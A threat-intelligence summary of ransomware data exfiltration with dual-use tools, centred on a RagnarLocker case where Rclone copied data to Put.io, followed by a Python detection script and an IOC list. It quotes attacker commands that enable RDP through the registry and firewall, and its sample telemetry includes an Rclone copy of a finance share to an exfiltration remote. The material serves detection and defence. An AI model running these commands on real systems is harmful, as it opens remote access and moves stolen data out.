Data Exfiltration: Increasing Number of Tools Leveraged by Ransomware Attackers

Ransomware actors are increasingly abusing legitimate, dual-use tools to exfiltrate data, rather than relying solely on bespoke malware. The RagnarLocker case study demonstrates how Rclone was used to copy data to Put.io, highlighting the trend toward stealthy data theft and the need for monitoring living-off-the-land tools. #RagnarLocker #Rclone

Keypoints

  • Ransomware actors are using legitimate/open-source and dual-use tools (e.g., AnyDesk, RDP, Cobalt Strike, ScreenConnect, Atera, WinRAR, Restic, TightVNC, WinSCP, Pandora RC, Chisel, PowerShell) to exfiltrate data and move laterally.
  • Case study: RagnarLocker (July 2023) shows a multi-step attack culminating in data exfiltration with Rclone to Put.io before deployment of the RagnarLocker payload.
  • Rclone is widely adopted by attackers for data exfiltration and is often renamed to masquerade as legitimate processes (masquerading).
  • Data exfiltration is a key step for extortion, with attackers leveraging stolen data for darknet leaks and coercion if ransoms are not paid.
  • Protection guidance emphasizes profiling trusted applications, measuring prevalence, and blocking rarely used or unused behaviors using tools like Symantec Adaptive Protection.
  • Mitigation recommendations include monitoring outbound traffic, auditing dual-use tools and registry changes, restricting RDP with MFA, strengthening admin account controls, and applying application whitelisting and PowerShell constraints.
  • The article provides a detailed Indicators of Compromise (IOC) table listing numerous hashes for tools like Rclone, AnyDesk, Cobalt Strike, ScreenConnect, Atera, WinRAR, Restic, TightVNC, WinSCP, Pandora RC, and Chisel.

MITRE Techniques

  • [T1567.002] Exfiltration to Cloud Storage – The attackers began using Rclone to copy data from network shares, e.g.
    “The attackers then began using Rclone to copy data from network shares, e.g.”
  • [T1036] Masquerading – Renaming the AnyDesk executable to appear innocuous, a technique known as masquerading, e.g.
    “renaming the AnyDesk executable to something that may appear more innocuous, a technique known as masquerading.”
  • [T1021.001] Remote Desktop Protocol – Enabling remote access via RDP, including registry modification and firewall rules, e.g.
    “For example, an attacker may attempt to enable RDP by simply modifying a registry key: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f” and
    “netsh advfirewall firewall add rule name="[NAME] RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow”
  • [T1059.001] PowerShell – Using PowerShell to run commands and facilitate exfiltration, e.g.
    “PowerShell: Microsoft scripting tool that can be used to run commands, download payloads, traverse compromised networks, and carry out reconnaissance.”
  • [T1560.001] Archive Collected Data – Using WinRAR/7-Zip to prepare files for exfiltration, e.g.
    “WinRAR: An archive manager that can be used to archive or zip files. Attackers have used WinRAR and similar utilities (e.g. 7-Zip) in order to prepare files for exfiltration.”
  • [T1082] System Information Discovery – Gathering system information and related steps, e.g.
    “gather system information, save registry hives, execute commands on other computers on the network, and enable the Remote Desktop Protocol (RDP) to facilitate remote access.”
  • [T1003] Credential Dumping – Dumping credentials using tools like Mimikatz and LaZagne, e.g.
    “deploying Mimikatz and LaZagne to dump credentials”
  • [T1046] Network Service Scanning – Discovering hosts/services with netscan.exe, e.g.
    “SoftPerfect Network Scanner (netscan.exe), a publicly available tool used for the discovery of host names and network services.”
  • [T1562.001] Impair Defenses – Disabling security protections, e.g.
    “PowerShell commands were executed to disable Local Security Authority (LSA) protection.”
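As an added example (not code from the Symantec post), the following Python shows how a defender could flag three of the behaviours listed above from process-creation telemetry: a renamed Rclone binary (T1036), Rclone copying to an unapproved remote (T1567.002), and RDP being enabled through the registry key or a firewall rule (T1021.001). The event records, the watched tool names and the approved-remote list are constructed assumptions.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry); the
# fields mirror Sysmon Event ID 1: Image, OriginalFileName (from the PE version
# resource) and CommandLine. The first three imitate the RagnarLocker chain.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Temp\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"C:\Windows\Temp\svchost.exe copy \\fs01\finance putio:leak --transfers 8"},
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "CommandLine": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"Image": r"C:\Windows\System32\netsh.exe", "OriginalFileName": "netsh.exe",
     "CommandLine": 'netsh advfirewall firewall add rule name="RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow'},
    {"Image": r"C:\Program Files\rclone\rclone.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"rclone.exe sync D:\backups backupsrv:nightly"},  # approved backup job
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe"},
]

# Assumed watch-list of dual-use tools the post says get renamed; extend per environment.
WATCHED_ORIGINALS = {"rclone.exe", "anydesk.exe"}
# Assumed allow-list of rclone remotes that are sanctioned (e.g. an internal backup target).
APPROVED_REMOTES = {"backupsrv"}

RDP_REG = re.compile(r"fDenyTSConnections.*?/d\s+0\b", re.IGNORECASE)
RDP_FW = re.compile(r"netsh\s+advfirewall.*localport=3389.*action=allow", re.IGNORECASE)
# An rclone remote looks like "name:path"; two or more leading letters exclude drive letters (D:\).
RCLONE_REMOTE = re.compile(r"(?<!\S)([A-Za-z][\w-]+):")


def detect(events):
    """Return (technique, detail) findings for the events; an empty list means nothing suspicious."""
    findings = []
    for ev in events:
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        orig = ev.get("OriginalFileName", "").lower()
        cmd = ev["CommandLine"]
        # T1036: a watched tool running under a different file name than its PE metadata declares
        if orig in WATCHED_ORIGINALS and orig != image:
            findings.append(("T1036", f"{image} is really {orig}"))
        # T1567.002: rclone copying to a remote that is not on the approved list
        if orig == "rclone.exe":
            for remote in RCLONE_REMOTE.findall(cmd):
                if remote.lower() not in APPROVED_REMOTES:
                    findings.append(("T1567.002", f"rclone remote {remote!r} not approved"))
        # T1021.001: RDP enabled via the registry key or opened in the host firewall
        if RDP_REG.search(cmd):
            findings.append(("T1021.001", "fDenyTSConnections set to 0"))
        if RDP_FW.search(cmd):
            findings.append(("T1021.001", "inbound TCP/3389 allowed"))
    return findings
```

The OriginalFileName comparison only catches renames of tools whose PE version resource is intact; pair it with hash-based matching against the post's IOC table for binaries that have been rebuilt or stripped.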

Indicators of Compromise

  • [SHA-256 hash] Rclone – d5e01c86dab89a0ecbf77c831e4ce7e0392bea12b0581929cace5e08bdd12196, df69dc5c7f62c06b0a64c9b065c3cbe7d034af6ba14131f54678135c33806f3e, and many more hashes
  • [URL] Put.io endpoints used for exfiltration – https://api.put[.]io, https://s100.put[.]io, and other Put.io domains
  • [File name] netscan.exe – discovery tool used during network scanning
  • [File name] Mimikatz – credential dumping tool used in the attack chain
  • [SHA-256 hash] 109b03ffc45231e5a4c8805a10926492890f7b568f8a93abe1fa495b4bd42975 – AnyDesk
  • [SHA-256 hash] 7d531afcc1a918df73f63579ca8d1a5c8048d8ac77917674c6805f31c8c9890f – AnyDesk
  • [SHA-256 hash] cdb82be1b9dd6391ed068124cfdf2339d71dd70f6f76462a7e4a0fdadd5a208a – Cobalt Strike

Read more: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-data-exfiltration